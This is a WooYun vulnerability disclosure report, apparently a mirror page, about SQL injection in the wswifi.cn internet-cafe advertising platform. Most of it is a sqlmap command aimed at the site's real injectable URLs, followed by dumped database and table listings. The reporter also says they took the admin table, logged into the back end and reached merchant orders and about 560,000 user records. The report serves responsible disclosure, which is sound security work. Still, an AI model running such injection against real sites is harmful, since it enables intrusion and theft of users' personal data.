乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-22: 细节已通知厂商并且等待厂商处理中 2016-04-22: 厂商已经确认,细节仅向厂商公开 2016-05-02: 细节向核心白帽子及相关领域专家公开 2016-05-12: 细节向普通白帽子公开 2016-05-22: 细节向实习白帽子公开 2016-06-06: 细节向公众公开
RT 可垮裤查询
注入点;sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"http://ws.wswifi.cn/news_text.asp?newsid=25
数据库信息
back-end DBMS: Microsoft SQL Server 2008available databases [8]:[*] Engineering_database[*] master[*] model[*] msdb[*] tempdb[*] ws_weigou[*] wswifi[*] xhzA8_V10_2013
表信息
Database: wswifi+------------------------------+---------+| Table | Entries |+------------------------------+---------+| dbo.user_Browse_record | 261096 || dbo.free_renzheng | 211319 || dbo.setggao_Browse_record | 43750 || dbo.user_Browse_allcount | 28472 || dbo.china | 3295 || dbo.user_login | 2640 || dbo.Businesses_data | 1451 || dbo.column_type | 1416 || dbo.user_prozan | 1345 || dbo.user_singin | 1208 || dbo.Businesses_user | 1180 || dbo.product | 849 || dbo.[user_renzheng_count---] | 450 || dbo.setggao_allcount | 373 || dbo.businesses | 360 || dbo.product_query | 327 || dbo.propinglun | 299 || dbo.Merchants | 273 || dbo.Businessesuser_roll | 260 || dbo.setggao_click_record | 230 || dbo.pangolin_test_table | 192 || dbo.job_Browse_record | 190 || dbo.user_renzheng | 96 || dbo.kehu_fahuo | 87 || dbo.Businessesuser_active | 83 || dbo.kehu_info | 73 || dbo.user_renzheng_weixin | 47 || dbo.rizhi_info | 46 || dbo.agent_apply | 33 || dbo.index_news | 29 || dbo.Businesses_Transfer | 28 || dbo.agent | 27 || dbo.setggao_fabu | 20 || dbo.agent_salesman | 18 || dbo.industry | 11 || dbo.Identification_type | 10 || dbo.[setggao_order---] | 9 || dbo.setggao | 7 || dbo.index_help | 5 || dbo.column_display_mode | 4 || dbo.agent_jibie | 3 || dbo.agent_job | 3 || dbo.wswifiadmin | 3 || dbo.column_leixing | 2 || dbo.job_Apply | 2 || dbo.[ggao_send----] | 1 || dbo.[ggao_type--] | 1 || dbo.setggao_send | 1 |+------------------------------+---------+
跑出了wswifiadmin 表后登陆后台 360个商家
都是网咖 ktv等垮裤查询 这里包括订单等信息
Database: ws_weigou+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| dbo.user_order_awardnum | 407332 || dbo.user_browsepro_record | 269214 || dbo.user_liulan_record | 111459 || dbo.user_Integral_detailed | 4424 || dbo.user_login | 3807 || dbo.china | 3295 || dbo.user_order | 3074 || dbo.wg_user | 2421 || dbo.user_consumption_record | 542 || dbo.[user_browsepro_record--] | 523 || dbo.user_recharge_record | 507 || dbo.Product_shopping_trolley | 429 || dbo.user_red_envelopes | 357 || dbo.Product_award | 59 || dbo.category | 30 || dbo.product | 25 || dbo.uploadapp_pro | 24 || dbo.user_delivery_address | 18 || dbo.user_award_public | 15 || dbo.crowdfunding_pro | 14 || dbo.crowdfunding_order_record | 10 || dbo.crowdfunding_order | 8 || dbo.friend_pro | 7 || dbo.user_grade | 2 || dbo.crowdfunding_order_temp | 1 || dbo.uploadadd | 1 || dbo.user_order_temp | 1 || dbo.wsweigou_admin | 1 |+-------------------------------+---------+
Database: Engineering_database+----------------------------------+---------+| Table | Entries |+----------------------------------+---------+| dbo.ggao_showcount_beifen | 25196092 || dbo.ggao_showcount | 3060837 || dbo.[ad_zhuomian_showcount--] | 1648957 || dbo.netbar_user_count | 561529 || dbo.ggao_clickcount | 486537 || dbo.ggao_allcount | 408032 || dbo.[ad_renzheng_lunbo_count--] | 328725 || dbo.rand_six_password | 200000 || dbo.netbar_user_allcount | 67232 || dbo.[netbar_zhuomian_allcount--] | 63633 || dbo.netbar_user_login | 47431 || dbo.netbar_user | 41135 || dbo.[ad_zhuomian_clickcount--] | 33934 || dbo.user_recharge | 8927 || dbo.netbar_login | 7432 || dbo.china | 3295 || dbo.ggao_fabu | 3008 || dbo.[netbar_lunbo_allcount--] | 1539 || dbo.product | 396 || dbo.Product_query | 312 || dbo.netbar | 281 || dbo.Package | 176 || dbo.ggao_send | 38 || dbo.netbar_admin | 29 || dbo.salesman | 21 || dbo.[ad_zhuomian--] | 17 || dbo.[Engineering_user--] | 9 || dbo.ggao_zizhu_allcount | 9 || dbo.netbar_user_renzheng | 8 || dbo.[ad_renzheng_lunbo--] | 3 || dbo.Engineering_admin | 3 || dbo.ggao_type | 3 || dbo.[ad_shezhi--] | 1 |+----------------------------------+---------+
dbo.netbar_user_count | 561529 56w用户信息
过滤
危害等级:高
漏洞Rank:20
确认时间:2016-04-22 14:08
高危漏洞
暂无